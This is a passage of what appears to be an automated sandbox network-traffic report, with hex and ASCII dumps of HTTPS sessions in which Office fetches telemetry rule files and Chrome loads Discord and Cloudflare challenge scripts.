                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    85192.168.2.54980413.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:45 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 8b9ec706-101e-000b-544c-3c5e5c000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201245Z-15b8b599d88wn9hhhC1TEBry0g00000003kg000000000rnc
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    86192.168.2.54980613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:45 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 491
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 2abfc2a9-b01e-003d-094d-3cd32c000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201245Z-15b8b599d88f9wfchC1TEBm2kc00000003n0000000002s7e
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    87192.168.2.549808162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC862OUTGET /assets/8e217faefc0006e5a018.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC957INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 8571
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0e459ab7d18-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "6340dbb0189ab130a0a6ae039c03f351"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 20:12:28 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dr5vYUXDRYR0Ni0ZUAjqxpuyj2fn4EQHOYhEr3DLawpatDk0EN6wvuczllWw2I9r8gZXR9y8z2kke12X1sEz5HwMpjlEkXUb5tNqOYNY%2FnFt2epLadhA4atqIjP3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC412INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 38 35 34 33 22 5d 2c 7b 37 32 35 34 33 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 64 28 65 2c 7b 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 34 35 34 35 38 35 29 2c 72 3d 6e 28 35 35 31 34 35 32 29 2c 69 3d 6e 28 35 33 32 39 30 31 29 3b 6c 65 74 20 61 3d 7b 2e 2e 2e 6c 2e 5a 2e 67 75 69 6c 64 45 76 65 6e 74 52 75 6c 65 73 2e 6c 69 6e 6b 2c 72 65 61 63 74 3a 28 30 2c 69 2e 5a 29 28 7b 65 6e 61 62 6c 65 42 75 69 6c 64 4f 76 65 72 72
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18543"],{725436:function(t,e,n){n.d(e,{m:function(){return u}});var l=n(454585),r=n(551452),i=n(532901);let a={...l.Z.guildEventRules.link,react:(0,i.Z)({enableBuildOverr
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 64 53 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 3a 21 30 7d 29 2e 72 65 61 63 74 7d 2c 75 3d 6c 2e 5a 2e 72 65 61 63 74 50 61 72 73 65 72 46 6f 72 28 7b 2e 2e 2e 6c 2e 5a 2e 67 75 69 6c 64 45 76 65 6e 74 52 75 6c 65 73 2c 6c 69 6e 6b 3a 61 2c 63 68 61 6e 6e 65 6c 4d 65 6e 74 69 6f 6e 3a 73 7d 29 7d 2c 33 31 35 34 31 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 31 39 32 33 37 39 29 2c 72 3d 6e 28 34 34 32 38 33 37 29 2c 69 3d 6e 28 38 39 37 32 38 35 29 2c 61 3d 6e 28 39 32 34 33 30 31 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 6e 29 7b 6c 65 74 20 73 3d 28 30 2c 72 2e 65 37 29 28 5b 61 2e 5a 50 5d 2c 28 29 3d 3e 61 2e 5a
                                                                                                                                                                                                                                                                                    Data Ascii: dStopPropagation:!0}).react},u=l.Z.reactParserFor({...l.Z.guildEventRules,link:a,channelMention:s})},315416:function(t,e,n){n.d(e,{Z:function(){return s}});var l=n(192379),r=n(442837),i=n(897285),a=n(924301);function s(t,e,n){let s=(0,r.e7)([a.ZP],()=>a.Z
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 33 31 30 30 36 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 6c 65 74 7b 73 6f 75 72 63 65 3a 65 2c 63 6c 61 73 73 4e 61 6d 65 3a 6e 7d 3d 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 6e 75 6c 6c 3a 28 30 2c 6c 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 69 28 29 28 61 2e 63 6f 6e 74 61 69 6e 65 72 2c 6e 29 2c 73 74 79 6c 65 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3a 22 75 72 6c 28 22 2e 63 6f 6e 63 61 74 28 65 2c 22 29 22 29 7d 7d 29 7d 7d 2c 37 34 32 35 39 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 64 28 65 2c 7b 48 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 2c 52 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 2c 5a 50 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                                    Data Ascii: 31006);function s(t){let{source:e,className:n}=t;return null==e?null:(0,l.jsx)("div",{className:i()(a.container,n),style:{backgroundImage:"url(".concat(e,")")}})}},742593:function(t,e,n){n.d(e,{HZ:function(){return T},Rf:function(){return S},ZP:function()
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 6e 2e 67 65 74 41 76 61 74 61 72 55 52 4c 28 72 2c 32 30 29 2c 73 69 7a 65 3a 73 2e 41 76 61 74 61 72 53 69 7a 65 73 2e 53 49 5a 45 5f 32 30 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 6e 75 6c 6c 21 3d 49 3f 49 3a 6e 2e 75 73 65 72 6e 61 6d 65 2c 63 6c 61 73 73 4e 61 6d 65 3a 66 2e 63 72 65 61 74 6f 72 7d 29 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 73 2e 54 6f 6f 6c 74 69 70 2c 7b 74 65 78 74 3a 4e 2e 69 6e 74 6c 2e 66 6f 72 6d 61 74 54 6f 50 6c 61 69 6e 53 74 72 69 6e 67 28 4e 2e 74 5b 22 2b 44 4c 73 44 77 22 5d 2c 7b 63 6f 75 6e 74 3a 6a 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 74 3d 3e 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 66 2e 72 73 76 70 43 6f 75 6e 74 2c 2e 2e 2e 74 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c
                                                                                                                                                                                                                                                                                    Data Ascii: n.getAvatarURL(r,20),size:s.AvatarSizes.SIZE_20,"aria-label":null!=I?I:n.username,className:f.creator})}),(0,l.jsx)(s.Tooltip,{text:N.intl.formatToPlainString(N.t["+DLsDw"],{count:j}),children:t=>(0,l.jsxs)("div",{className:f.rsvpCount,...t,children:[(0,l
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 72 72 65 6e 63 65 49 64 3a 78 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 53 2c 7b 6e 61 6d 65 3a 69 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 61 2c 68 65 61 64 65 72 56 61 72 69 61 6e 74 3a 65 2c 64 65 73 63 72 69 70 74 69 6f 6e 43 6c 61 73 73 4e 61 6d 65 3a 6e 2c 74 72 75 6e 63 61 74 65 3a 63 2c 67 75 69 6c 64 49 64 3a 6f 2c 69 6d 61 67 65 53 6f 75 72 63 65 3a 73 7d 29 5d 7d 29 7d 7d 2c 33 39 30 39 36 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 64 28 65 2c 7b 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 7d 7d 29 2c 6e 28 34 37 31 32 30 29 3b 76 61 72 20 6c 2c 72 2c 69 3d 6e 28 32 30 30 36 35 31 29 2c 61 3d 6e 28 31 39 32 33 37 39 29 2c 73 3d 6e 28 31 32 30 33 35 36 29 2c 75 3d 6e 2e 6e 28 73 29 2c 63 3d 6e 28 39 31 33 35 32 37
                                                                                                                                                                                                                                                                                    Data Ascii: rrenceId:x}),(0,l.jsx)(S,{name:i,description:a,headerVariant:e,descriptionClassName:n,truncate:c,guildId:o,imageSource:s})]})}},390966:function(t,e,n){n.d(e,{z:function(){return j}}),n(47120);var l,r,i=n(200651),a=n(192379),s=n(120356),u=n.n(s),c=n(913527
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 5a 78 6a 49 29 3a 66 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 66 2e 74 5b 22 58 32 4b 33 2f 2f 22 5d 29 29 3b 6c 65 74 20 5f 3d 28 30 2c 78 2e 5a 29 28 43 2c 49 29 2c 5b 7b 73 74 61 72 74 44 61 74 65 54 69 6d 65 53 74 72 69 6e 67 3a 62 2c 65 6e 64 44 61 74 65 54 69 6d 65 53 74 72 69 6e 67 3a 41 2c 63 75 72 72 65 6e 74 4f 72 50 61 73 74 45 76 65 6e 74 3a 50 2c 75 70 63 6f 6d 69 6e 67 45 76 65 6e 74 3a 52 2c 64 69 66 66 4d 69 6e 75 74 65 73 3a 4f 7d 2c 6b 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 28 30 2c 68 2e 75 62 29 28 65 2c 73 29 29 3b 61 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 6b 28 28 30 2c 68 2e 75 62 29 28 65 2c 73 29 29 3b 6c 65 74 20 74 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 29 3d 3e 6b 28 28 30 2c 68 2e 75 62 29 28 65 2c 73 29 29 2c 31 65
                                                                                                                                                                                                                                                                                    Data Ascii: ZxjI):f.intl.string(f.t["X2K3//"]));let _=(0,x.Z)(C,I),[{startDateTimeString:b,endDateTimeString:A,currentOrPastEvent:P,upcomingEvent:R,diffMinutes:O},k]=a.useState((0,h.ub)(e,s));a.useEffect(()=>{k((0,h.ub)(e,s));let t=setInterval(()=>k((0,h.ub)(e,s)),1e
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1314INData Raw: 74 42 72 61 6e 64 3a 4c 2c 74 65 78 74 50 6f 73 69 74 69 76 65 3a 5a 2c 74 65 78 74 44 61 6e 67 65 72 3a 77 2c 65 6e 64 44 61 74 65 54 69 6d 65 53 74 72 69 6e 67 3a 41 2c 73 74 61 72 74 44 61 74 65 54 69 6d 65 53 74 72 69 6e 67 3a 62 7d 29 2c 5b 48 2c 4c 2c 5a 2c 77 2c 41 2c 62 5d 29 2c 4d 3d 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 21 3d 44 29 7b 6c 65 74 20 74 3d 28 30 2c 68 2e 48 6f 29 28 44 29 3b 4d 3d 66 2e 69 6e 74 6c 2e 66 6f 72 6d 61 74 54 6f 50 6c 61 69 6e 53 74 72 69 6e 67 28 66 2e 74 2e 48 6d 4b 45 71 61 2c 7b 72 65 63 75 72 72 65 6e 63 65 52 75 6c 65 3a 74 2e 74 6f 54 65 78 74 28 29 7d 29 3b 6c 65 74 20 6e 3d 6f 28 29 28 65 29 3b 4d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 65 2e 74 6f 44 61 74 65 28 29 2c 6c 3d 6e 2e 74 6f 4c
                                                                                                                                                                                                                                                                                    Data Ascii: tBrand:L,textPositive:Z,textDanger:w,endDateTimeString:A,startDateTimeString:b}),[H,L,Z,w,A,b]),M=null;if(null!=D){let t=(0,h.Ho)(D);M=f.intl.formatToPlainString(f.t.HmKEqa,{recurrenceRule:t.toText()});let n=o()(e);M=function(t,e){let n=e.toDate(),l=n.toL


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    88192.168.2.549809162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC848OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC739INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                    Content-Length: 8042
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWzaZuDFr6ZgyuvMTvMJ6cao8aZzl5c06PzY%2BJqoVrnMIKXKWPMfmImFKM6Sv3Dr9z3ihmOdDZdxitah3NHPOhQo7KHycH40Gb8LSsm0rmDTo5PNqCXKmSSOW5Jc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0e45e530cbc-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC630INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6e 2c 6f 2c 73 2c 7a 2c 41 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 55 2c 65 2c 66 29 7b 66 6f 72 28 55 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 55 28 33 30 34 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 55 28 33 32 38 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 55 28 33 32 37 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 33 31 39 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 55 28 33 32 32 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 32 35 31 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 55 28 33 32 36 29 29 2f 37 2a 28 2d 70 61 72 73
                                                                                                                                                                                                                                                                                    Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=-parseInt(U(304))/1+parseInt(U(328))/2+parseInt(U(327))/3+-parseInt(U(319))/4+parseInt(U(322))/5*(-parseInt(U(251))/6)+parseInt(U(326))/7*(-pars
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 2c 4b 3d 32 2c 4c 3d 33 2c 4d 3d 32 2c 4e 3d 5b 5d 2c 4f 3d 30 2c 50 3d 30 2c 51 3d 30 3b 51 3c 44 5b 61 32 28 32 36 31 29 5d 3b 51 2b 3d 31 29 69 66 28 52 3d 44 5b 61 32 28 32 38 37 29 5d 28 51 29 2c 4f 62 6a 65 63 74 5b 61 32 28 32 37 33 29 5d 5b 61 32 28 32 33 31 29 5d 5b 61 32 28 32 38 31 29 5d 28 48 2c 52 29 7c 7c 28 48 5b 52 5d 3d 4c 2b 2b 2c 49 5b 52 5d 3d 21 30 29 2c 53 3d 4a 2b 52 2c 4f 62 6a 65 63 74 5b 61 32 28 32 37 33 29 5d 5b 61 32 28 32 33 31 29 5d 5b 61 32 28 32 38 31 29 5d 28 48 2c 53 29 29 4a 3d 53 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 32 28 32 37 33 29 5d 5b 61 32 28 32 33 31 29 5d 5b 61 32 28 32 38 31 29 5d 28 49 2c 4a 29 29 7b 69 66 28 32 35 36 3e 4a 5b 61 32 28 32 34 31 29 5d 28 30 29 29 7b 66 6f 72 28 47 3d 30 3b 47 3c
                                                                                                                                                                                                                                                                                    Data Ascii: ,K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(261)];Q+=1)if(R=D[a2(287)](Q),Object[a2(273)][a2(231)][a2(281)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(273)][a2(231)][a2(281)](H,S))J=S;else{if(Object[a2(273)][a2(231)][a2(281)](I,J)){if(256>J[a2(241)](0)){for(G=0;G<
